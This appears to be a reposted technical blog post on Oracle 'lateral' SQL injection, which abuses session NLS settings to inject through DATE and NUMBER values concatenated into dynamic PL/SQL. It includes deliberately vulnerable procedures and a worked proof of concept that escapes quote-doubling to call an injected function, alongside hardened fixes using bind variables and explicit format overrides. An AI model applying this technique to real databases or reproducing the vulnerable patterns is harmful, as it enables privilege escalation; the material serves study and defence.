Oracle lateral SQL injection: personal insights

Source: Internet
Author: User
Tags: sql injection, sql injection attack
If you execute SQL statements directly (static SQL) or bind the parameters, there is not much to worry about, for example with the following Oracle stored procedure:
CREATE OR REPLACE PROCEDURE kjdatepoc (d DATE)
AS
BEGIN
  -- static SQL: the DATE value is passed as a bind, never as statement text
  INSERT INTO kjdatetable VALUES (d);
  COMMIT;
END;
/

A procedure like this need not fear the newer SQL injection technique. So where does injection through DATE and NUMBER values arise? Generally in dynamic SQL that concatenates the values instead of binding them, for example the DBMS_SQL package or EXECUTE IMMEDIATE, which engineers use all the time.

Look at the following stored procedure:

CREATE OR REPLACE PROCEDURE kjdatepoc (d DATE)
AS
BEGIN
  -- dynamic SQL: d is implicitly converted to text using the session's NLS_DATE_FORMAT
  EXECUTE IMMEDIATE 'INSERT INTO kjdatetable VALUES (''' || d || ''')';
  COMMIT;
END;
/

If you encounter a stored procedure or function like the one above, SQL injection can be achieved by changing the value of NLS_DATE_FORMAT in the session.

The paper by the overseas researcher explains this in great detail, so I will not repeat it here.

For NUMBER-type injection, just a short demonstration that a single quote can be produced in the output.
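The fix for the dynamic procedure above is to bind the DATE rather than render it into the statement text. The following is an added example, not code from the original post: the procedure and table names are the post's own, the CREATE TABLE is assumed so the script runs stand-alone in SQL*Plus or SQLcl, and the NLS_DATE_FORMAT value used at the end is an arbitrary format chosen for the demonstration.

```sql
-- Added example (not from the original post): kjdatepoc rebuilt on a bind variable.
-- Table definition is assumed for a self-contained run.
CREATE TABLE kjdatetable (d DATE);

CREATE OR REPLACE PROCEDURE kjdatepoc (d DATE)
AS
BEGIN
  -- :1 is a bind placeholder. The DATE never becomes part of the statement
  -- text, so the session's NLS_DATE_FORMAT cannot change what is executed.
  EXECUTE IMMEDIATE 'INSERT INTO kjdatetable VALUES (:1)' USING d;
  COMMIT;
END;
/

-- Audit check: how would a DATE render in this session if someone did
-- concatenate it? A format containing anything other than date elements
-- and plain separators deserves a closer look.
SELECT value
  FROM nls_session_parameters
 WHERE parameter = 'NLS_DATE_FORMAT';

-- Changing the session format afterwards has no effect on the bound insert:
-- the row is stored as a DATE regardless of how the session would print it.
ALTER SESSION SET nls_date_format = 'YYYY-MM-DD HH24:MI:SS';

BEGIN
  kjdatepoc(SYSDATE);
END;
/

SELECT d FROM kjdatetable;
```

The same USING clause applies to DBMS_SQL (BIND_VARIABLE) and to NUMBER parameters; the point is that any value reaching EXECUTE IMMEDIATE as a bind is typed data, not text assembled under the caller's NLS settings.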

Look at the following statements:

ALTER SESSION SET nls_numeric_characters = '''.';
-- decimal character is now a single quote, group character a period
SELECT TO_NUMBER(1000.10001, '999999d99999') || '' FROM DUAL;

The output is:

1000'10001

One extra single quote; what use is that? Plenty, in the right situation. Look at the following stored procedure:

CREATE OR REPLACE PROCEDURE numinjpoc (kjexpnum NUMBER, kjexpstr VARCHAR2)
IS
  secstr VARCHAR2(1000);
BEGIN
  -- the string argument is "escaped" by doubling every single quote
  secstr := REPLACE(kjexpstr, '''', '''''');
  -- the number argument is concatenated as-is, converted with the session's NLS settings
  sys.dbms_output.put_line('SELECT * FROM DUAL WHERE id=' || kjexpnum || ' AND name=''' || secstr || '''');
END;
/

The VARCHAR2 argument is escaped internally. Let us test it:

BEGIN
  numinjpoc(1000, ''' --');
END;
/

The SQL statement it prints is:

SELECT * FROM DUAL WHERE id=1000 AND name=''' --'

The single quote has been escaped.

So how do we inject if we combine this with the NUMBER type?

ALTER SESSION SET nls_numeric_characters = '''.';

BEGIN
  numinjpoc(TO_NUMBER(0.10001, '999999d99999'), ' || kj.exp() -- ');
END;
/

Check the output:

SELECT * FROM DUAL WHERE id='10001 AND name=' || kj.exp() -- '

So the injection succeeds indirectly...

To a certain extent this only works when an ALTER SESSION can be issued alongside it; it can then be aimed at functions or procedures inside the system to elevate privileges. It is not a great breakthrough idea, but for single-statement SQL injection attacks, judging by the results, there is not much else to go on.
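What numinjpoc gets wrong is not the string side (the quotes are doubled) but the number side: kjexpnum is converted to text under whatever NLS_NUMERIC_CHARACTERS the session carries. The following is an added example, not code from the original post, showing the procedure hardened for the case where the statement text really must be assembled by hand (here it is only printed, as in the post). Procedure and parameter names are the post's; the TO_CHAR format model, the regular-expression check and the error number are assumptions made for the example.

```sql
-- Added example (not from the original post): numinjpoc with the number
-- rendered under an explicit NLS setting and checked before concatenation.
CREATE OR REPLACE PROCEDURE numinjpoc (kjexpnum NUMBER, kjexpstr VARCHAR2)
IS
  numstr VARCHAR2(60);
  secstr VARCHAR2(1000);
BEGIN
  -- Render the number with a fixed decimal/group pair. The third argument
  -- overrides the session's NLS_NUMERIC_CHARACTERS, so no ALTER SESSION
  -- issued beforehand can put a quote into the rendered number.
  numstr := TO_CHAR(kjexpnum, 'TM9', 'NLS_NUMERIC_CHARACTERS=''.,''');

  -- Belt and braces: refuse anything that is not a plain decimal literal.
  -- (TM9 switches to scientific notation for very long values; this check
  -- rejects that too rather than letting an unexpected shape through.)
  IF NOT REGEXP_LIKE(numstr, '^-?[0-9]*\.?[0-9]+$') THEN
    RAISE_APPLICATION_ERROR(-20001, 'unexpected number rendering: ' || numstr);
  END IF;

  -- String side unchanged from the post: double every embedded quote.
  secstr := REPLACE(kjexpstr, '''', '''''');

  sys.dbms_output.put_line(
    'SELECT * FROM DUAL WHERE id=' || numstr || ' AND name=''' || secstr || '''');
END;
/

-- Same call sequence as the post's attack. The number is now printed with a
-- period as its decimal character, so the second argument stays entirely
-- inside the quoted name literal instead of breaking out of it.
SET SERVEROUTPUT ON
ALTER SESSION SET nls_numeric_characters = '''.';

BEGIN
  numinjpoc(TO_NUMBER(0.10001, '999999d99999'), ' || kj.exp() -- ');
END;
/
```

Two notes on the design. First, if the assembled statement were executed rather than printed, EXECUTE IMMEDIATE with a USING clause removes the problem entirely and is the fix to prefer; explicit TO_CHAR with an NLS override is for places such as DDL or logging where the text itself is the product. Second, for the string side Oracle's supported helper is DBMS_ASSERT.ENQUOTE_LITERAL, which wraps a value in single quotes and raises an error on an unbalanced embedded quote, so a caller who can only reach the string parameter gets an exception rather than a malformed statement.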